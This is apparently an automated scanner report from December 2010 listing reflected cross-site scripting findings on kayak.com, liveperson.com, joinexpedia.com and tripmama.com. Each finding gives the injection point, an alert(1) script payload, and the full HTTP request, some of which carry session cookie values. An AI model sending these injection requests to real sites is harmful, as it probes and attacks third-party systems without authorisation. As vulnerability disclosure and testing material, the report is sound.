The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a36f7'-alert(1)-'a6741b80b63 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /default.aspx?a36f7'-alert(1)-'a6741b80b63=1 HTTP/1.1 Host: www.tripmama.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5134e"><script>alert(1)</script>204df97cca7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /us/us.asp HTTP/1.1 Host: joinexpedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=5134e"><script>alert(1)</script>204df97cca7
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Sun, 12 Dec 2010 15:59:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 51530 Content-Type: text/html; Charset=UTF-8 Set-Cookie: ASPSESSIONIDCATQCRAD=ACIPOHFCPCJMOMALBHFLICBE; path=/ Cache-control: private
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <meta http-equiv="Cont ...[SNIP]... <input type=hidden name="00N7000000231Le" id="00N7000000231Le" value="http://www.google.com/search?hl=en&q=5134e"><script>alert(1)</script>204df97cca7"> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a4b6'-alert(1)-'b3e08ce0f0a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ref/lppb.asp HTTP/1.1 Host: solutions.liveperson.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=2a4b6'-alert(1)-'b3e08ce0f0a
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Sun, 12 Dec 2010 16:00:13 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Content-Length: 3686 Content-Type: text/html Set-Cookie: visitor=ref=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fhl%3Den%26q%3D2a4b6%27%2Dalert%281%29%2D%27b3e08ce0f0a; expires=Sun, 10-Jan-2010 05:00:00 GMT; domain=.liveperson.com; path=/ Set-Cookie: ASPSESSIONIDSQDRBASS=HCNCNJICKKNNBMHIFEBMDBGE; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload e908a<script>alert(1)</script>2c316bd4508 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 3d820<script>alert(1)</script>30bf94311b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 3e428<script>alert(1)</script>d653d3c791 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /h/ads/results HTTP/1.1 Host: www.kayak.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)3e428<script>alert(1)</script>d653d3c791 Connection: close Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload fe551<script>alert(1)</script>1f66daf43e5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /h/elanding HTTP/1.1 Host: www.kayak.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA; Referer: http://www.google.com/search?hl=en&q=fe551<script>alert(1)</script>1f66daf43e5
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 11cd5<script>alert(1)</script>283fa34da67 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload da5be<script>alert(1)</script>a76990262a0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /in HTTP/1.1 Host: www.kayak.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA; Referer: http://www.google.com/search?hl=en&q=da5be<script>alert(1)</script>a76990262a0
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 27aab<script>alert(1)</script>33f2cc57ae0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /out HTTP/1.1 Host: www.kayak.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA; Referer: http://www.google.com/search?hl=en&q=27aab<script>alert(1)</script>33f2cc57ae0
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload c596c<script>alert(1)</script>a8d5e12a312 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /s/jsresults HTTP/1.1 Host: www.kayak.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c596c<script>alert(1)</script>a8d5e12a312 Connection: close Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 38334<script>alert(1)</script>4e39f207cf6 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /s/qrystat HTTP/1.1 Host: www.kayak.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)38334<script>alert(1)</script>4e39f207cf6 Connection: close Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload cad22<script>alert(1)</script>aee2165ce3d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /s/search/air HTTP/1.1 Host: www.kayak.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA; Referer: http://www.google.com/search?hl=en&q=cad22<script>alert(1)</script>aee2165ce3d
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload c8ef9<script>alert(1)</script>abfc3092c11 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /s/search/car HTTP/1.1 Host: www.kayak.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA; Referer: http://www.google.com/search?hl=en&q=c8ef9<script>alert(1)</script>abfc3092c11
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 8c6ae<script>alert(1)</script>cce32a6a65b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /s/search/hotel HTTP/1.1 Host: www.kayak.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA; Referer: http://www.google.com/search?hl=en&q=8c6ae<script>alert(1)</script>cce32a6a65b
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload edeff<script>alert(1)</script>fc9e772a42c was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /s/sparkle HTTP/1.1 Host: www.kayak.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)edeff<script>alert(1)</script>fc9e772a42c Connection: close Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 270ba<script>alert(1)</script>a1151bfba5c was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /vs/client%20page%20load/final%20results/car/ms/19 HTTP/1.1 Host: www.kayak.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)270ba<script>alert(1)</script>a1151bfba5c Connection: close Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 42483<script>alert(1)</script>500cb5f5695 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /vs/client%20page%20load/final%20results/flight/ms/264 HTTP/1.1 Host: www.kayak.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)42483<script>alert(1)</script>500cb5f5695 Connection: close Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 29c69<script>alert(1)</script>acae3436257 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /vs/client%20page%20load/final%20results/hotel/ms/407 HTTP/1.1 Host: www.kayak.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)29c69<script>alert(1)</script>acae3436257 Connection: close Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 12e29<script>alert(1)</script>e25ef676ba4 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /vs/client%20page%20load/front%20door/cars/ms/281 HTTP/1.1 Host: www.kayak.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)12e29<script>alert(1)</script>e25ef676ba4 Connection: close Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload e379e<script>alert(1)</script>736a3e83ed9 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /vs/client%20page%20load/front%20door/flights/ms/332 HTTP/1.1 Host: www.kayak.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)e379e<script>alert(1)</script>736a3e83ed9 Connection: close Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 2589f<script>alert(1)</script>56e66f656a was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /vs/client%20page%20load/front%20door/hotels/ms/311 HTTP/1.1 Host: www.kayak.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)2589f<script>alert(1)</script>56e66f656a Connection: close Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 9b4c3<script>alert(1)</script>d3fe1999a52 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /vs/client%20page%20load/front%20door/hotels/ms/378 HTTP/1.1 Host: www.kayak.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)9b4c3<script>alert(1)</script>d3fe1999a52 Connection: close Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload d108a<script>alert(1)</script>2c18a6b7fab was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /vs/client%20page%20load/front%20door/hotels/ms/408 HTTP/1.1 Host: www.kayak.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d108a<script>alert(1)</script>2c18a6b7fab Connection: close Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload c1727<script>alert(1)</script>e2be0b58233 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
